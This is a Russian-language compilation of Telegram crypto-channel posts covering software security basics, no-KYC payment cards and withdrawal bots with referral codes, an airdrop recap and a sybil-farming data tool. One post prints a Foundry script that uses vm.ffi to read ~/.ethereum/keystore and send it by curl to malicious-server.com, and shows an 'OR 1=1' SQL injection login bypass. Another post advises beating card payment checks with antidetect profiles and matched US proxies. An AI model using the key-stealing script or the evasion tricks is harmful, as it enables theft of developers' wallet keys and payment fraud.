🐙 СОФТ БЕЗОПАСНОСТЬ

Изоляция

Благодаря Docker создаем контейнер для модуля, отвечающего за подписания транзакций, и он будет изолирован от других частей приложения.

(в docker приложение работает изолированно, ограничивая влияние уязвимостей на другие части системы.)

Асинхронность 🔽

выполняют задачи, не блокируя выполнение других процессов

важно при работе с внешними API, которые могут отвечать медленно из-за задержек сети или нагрузки на сервер.

Для Node.js асинхронность реализуется через “Promise” (возвращает результат (или ошибку) в будущем)

+ async/await синтаксис для работы с Promise делает код более читаемым.

Библиотека asyncio в Python предоставляет async/await функции также для работы с асинхронностью

Такие функции позволяют продолжать выполнение других задач, пока приложение ожидает ответа от API.

Логирование

запись важной информации о работе приложения (действия пользователя, состояние системы и ошибки)

Winston (Node.js) поддеритвает различные уровни логов (info, error, debug и т.д.).

npm install winston

Logging (Python) - поддерживает уровни логирования (DEBUG, INFO, WARNING, ERROR, CRITICAL).

Стандартная библиотека Python

Для более красивого вывода логов в консоль -> Loguru библиотека

pip install loguru

Набираем активность - я выпускаю подробный материал на эту тему 😎

📟 Прилетело из @code_vartcall

☯️ Почистить карму

▶️Видео обзор на софт залит на Youtube

Рассказал как правильно тапать бычка, приятного просмотра👀
Тайм-коды прикрепил, разобрал абсолютно все моменты для плавного запуска машины.

🟢Бот для покупки и отслеживанния ключей - @astrumsolutionsbot

Astrum - лучший сервис для ретро | AstrumDocs | GitHub

📟 Прилетело из @askaer

☕️ На кофе

🤍 ЗАРАБОТАЛ 100к$ ЗА СУТКИ

И проебал все на следующий день. В этом посте будет подборка сервисов для перевода ваших крипто-фантиков в что-то осязаемое и полезное: вывод в фиат, оплата иностранных сервисов, оплата игр, реинвест в альфы и так далее

🤓 SOLCARD

Очень и очень давно писал об этом сервисе. Позволяет создать зарубежную карту без KYC и оплачивать любой сервис: от GPT до бронирования отелей. Есть два варианта карт:

1) MasterCard — самая обычная карта, цена активации 5$ 3$ по рефке, оплчивал через нее GPT и Webshare

2) Visa — самая лучшая карта, цена активации 40$ 24$ по рефке, можно привязать к Apple и Google Pay и платить в ИРЛ в любой точке мира

Для экономии переходите по реферальной ссылке, процент скидки очень хороший (КЛИК). Также читайте условия использования, есть лимиты, но они большие. Подробнее про оплату сервисов этой картой написал в конце поста

🤓 SEND

Самый популярный телеграмм бот, через который можно вывести крипту, обменять крипту, оплатить криптой и многое другое. Лично я через него вывожу деньги в фиат через P2P, все очень просто и быстро

1) Запускаем бота — клик
2) Жмем кнопку "Кошелек" и депаем
3) После кнопку "P2P" и продаем за рубли

Есть все популярные токены, даже добавили $TRUMP. Вывод на все банки РФ, через сбп, пополнение счета телефона и так далее. Также можно купить через бота крипту, курсы более менее хорошие и сделки быстрые

🤓 CHERIEX

Супер полезное приложение, через которое можно оплачивать криптой любую покупку. Через него удобно платить не выводя в фиат, просто держать на балансе крипту в $. Обязательно вводите реферальный код, получите 100$ на баланс 🙂

1) Запускаем бота — клик
2) Вводим реферальный код:
b8d1733a-d5d3-467b-92eb-bf653b64164c
3) Пополняем баланс стейблами
4) Сканируем QR код
5) Ждем до 1 минуты и оплата проходит

Курс обмена хороший, комиссии низкие. Раньше было в виде отдельного приложения, но сейчас додумались перенести в TG бота и стало очень удобно. Единственное нужно ждать вплоть до минуты пока не пройдет оплата, но в ресторанах никто и не торопит 😎

🤓 Play Wallet

Если же не хотите наслаждаться реальной жизнью, то можете пополнить стим и купить игры. Комиссия как и везде (6%), но зато есть пополнение в любой валюте: рубли, гривны и так далее

1) Переходим на сайт — клик
2) Логинимся как удобно
3) Выбираем Steam для оплаты
4) Указываем страну и логин Steam
5) Выбираем способ оплаты и платим

Из минусов:
1) Максимально уебищный дизайн сайта
2) Уже дохуя времени нет рефералки
3) Нет оплаты через другие кошельки
4) В целом медленно билдят

🤓 WantToPay

Напоследок дефолтный бот, в котором можно создать зарубежную карту и оплатить сервисы. Тут нет пополнения криптой, только рублями, но тем не менее если нужно что-то купить — подойдет

1) Запускаем бота — клик
2) Депаем рубли и покупаем что нужно

🌟 И наконец!

Реинвестируйте свои заработанные монетки в альфы, где можно найти актуальную информацию и колы. Например в Gem Hunters, у которых сейчас новый набор. Поверьте, данное вложение окупится, а не уйдет в карман рагера щитка

Обязательно изучите их свежий рекап, а также присоединяйтесь к бесплатному альфа каналу @gemhunterslobby и @monidegen, а также к чату со смарт криптанами @monidegens

🔞 Как не руинить оплату

Когда оплачивал через SolCard GPT, то он не хотел принимать. Решается просто — создаем свежий профиль антика, подрубаем качественные прокси USA, на карте выбираем ближайший к IP адрес и вводим его и данные карты

Если не проходит, то меняем прокси и пробуем снова. Основной заеб именно с payment address, на других сервисах так не ебут. Еще можете чекнуть по bin карты кто выпустил карту (какой банк) и оттуда выбирать адрес и прокси

😵‍💫 щитпост | все мои ссылки | плати соланой

📟 Прилетело из @in_crypto_info

☯️ Почистить карму

Разблядовка по NotPixel 🔫

Замотались и забыли написать про NotPixel и их вчерашний дроп. Судя по чатам - сплошная бритва и разочарование. Однако, среди моих знакомых, а также некоторых наших кодеров нашлись и те, кто неплохо заработал. Цифры разные, но из жирного видел, суммы: 4к$, 6к$, 10к$+. Думаю, что для обычной тапалки это неплохой результат, но есть много но... 🤫

Будем честны - заработали только рефоводы, однако если вы загнали свою ферму и вас не сбрило, то вы 100% сняли сливки. Например дев софта, который мы упоминали в канале неплохо заработал. НО! Сугубо за счет рефов. Также брили и ручные акки: чуваков с большим количеством рефов тоже сбривало, однако постоянная мозгоебка в поддержку творит чудеса.

Что у вас? Есть кто заработал? 💸

📟 Прилетело из @hidden_coding

🍣 На суши

❤️DataBuiler - помощник для борьбы с Nansen
#бесплатно

Не справедливо сбривать порядочных сибилов, поэтому Oxygen.Tools спешит на помощь. Написали для вас простой, но удобный инструмент что поможет жонглировать информацией по аккаунтам и заполнять анти-сибил форму.

• Скачайте архив с Data Builder: ТЫК🔗

Что же умеет:

— Проверят кол-во транзакций в EVM сетях: eth, bsc, arb, base , linea, zora, polygon, blast, optimism, avalanche, scroll, zksync;
— Проверяет наличие ключевых дропов и собирает их TX: arbitrum, blast, meme, polyhedra, orbiter, l0, zksync, scroll, swell, optimism;
— Записывает всё в Excel таблицу;

Быстрые настройки:

key value - 1;
attemp - 1;

Если хотите проверить через приватники:

private - приватники, каждый с новой строки
proxy - ip:port:login:pass, каждый с новой строки
address - не нужны

Если без приватников:

private - адреса кошельков, каждый с новой строки
proxy - ip:port:login:pass, каждый с новой строки
address - адреса кошельков, каждый с новой строки

F.A.Q:

— Логин и пароль: oxygentools;
— Таблица excel сохраняется в папке с ботом -> STATISTICS -> Linea Helper;
— Если хотите больше дропов -> в лс нужно скинуть транзу клеймам такого, только для EVM;
— Прокси обязательны, и желательно не СНГ, так как в скрипте есть Zora. Почитайте какие юзать в вики: ТЫК🔗

✍️ Если есть вопросы - задавайте их нашему менеджеру - @ProstoXleb

✍️ Покупка подписки и скидка 15% : https://news.1rj.ru/str/OduLandBot?start=r_oxygen_tools

📟 Прилетело из @oxygen_tools

☯️ Почистить карму

☕️ Telegram Checker | Python

настройка проекта

1. Зависимости

Библиотеки web3 & pytelegrambotapi

WebSocket провадер для получения событий Alchemy / Infura.

Создаем Telegram бот и получаем его API токен - BotFather

2. Процесс работы софта

- Подключение к блокчейну через WebSocket

- Фильтр событий, связанных с нужным адресом

- Настройка отправки сообщений через API Telegram + встраивание уведомлений в обработку событий

- Деплой бота через DigitalOcean или AWS

При добавлении поддержки других блокчейнов, используем сооответвующие настройки WebSocket

3. Настройка Docker (что это)

деплоить будем через него, так единый docker образ проекта

- Создаем DockerFile - базовый образ с зависимостями

- Создать .dockerignore - Исключаем из сборки ненужные файлы

- Сетевые настройки - порты для доступа к WebSoket открыты и доступны

- Управление секретами - писал тут

- Собираем Образ через Docker build и запускаем через docker run

+ Настроить автоматический перезапуск контейнера в случае падения бота

Вот такой план, далее пошагово будем тут реализовывать 💫 ❤️ 🔥

📟 Прилетело из @code_vartcall

☕️ На кофе

ADS накрыло

Не надо MM и OKX кошами пользоваться через ADS, а то спина будет болеть.

Закрытый код безопаснее оказался 😌

📟 Прилетело из @askaer

👧 На суши и девочек

Друзья, GM!

Если сейчас и есть какой-то один текст, который я бы советовал прочитать каждому криптану (особенно недавно пришедшему на рынок), то это статья jez: a starter guide to crypto mmo.

Поэтому я сделал авторский перевод этой статьи: https://teletype.in/@dkefir/starting-guide-to-crypto-mmo-ru.

Прочтение займет не более 10-15 минут вашего времени, — крайне рекомендую!

А также скидываю вам великолепный джаз-хаус микс, под который вы можете начать сей прекрасный субботний день: https://youtu.be/0c0-ikGKP9U?si=BkTYR6Qgit9dk_8u

P.S: почему-то, если читать через встроенный ридер («посмотреть») — там вылезает старая версия текста, где я не удалил абзацы на английском, поэтому рекомендую проходить именно по ссылке, чтобы не пришлось их пролистывать 🌟.

📟 Прилетело из @insuline_eth

☕️ На кофе

💻 Уязвимости web3-сервисов

наконец-то движ

1. Foundry + ffi = true

foundry - инструмент тестирования и деплоя смарт-контрактов (про него тут)

Ситуация - вы выкладываете репо где есть Foundry-скрипты (например, .t.sol или .ts файлы), которые содержат вызовы vm.ffi().

Разработчик скачивает репозиторий и запускает тесты или скрипты
Скрипт с ffi выполняет следующие команды (по усмотрению)

Чтение приватных ключей из файловой системы + отправка на сервер через HTTP или другой протокол

например

contract MaliciousScript is Script {
function run() public {

string;
commands[0] = "cat";
commands[1] = "~/.ethereum/keystore";
commands[2] = "| curl -X POST http://malicious-server.com --data-binary @-";
vm.ffi(commands);
}
}

Когда пользователь запускает этот скрипт (например, через forge noscript), он выполняет команду cat ~/.ethereum/keystore для чтения ключей.

Затем ключи отправляются на ваш сервер через команду curl.

2. SQL-Инъекции

ввод OR 1=1 в поле авторизации может привести к обходу проверки подлинности + получение доступа к системе без действительных учетных данных.

Условие OR 1=1 всегда истинно, что приведет к возврату всех данных, независимо от их категории или статуса выпуска

таким образом мы получаем доступ к приватникам & учетным данным пользоватлей 💼

будем возвращаться к этой рубрике, но сами таким не занимаемся

📟 Прилетело из @code_vartcall

🍣 На суши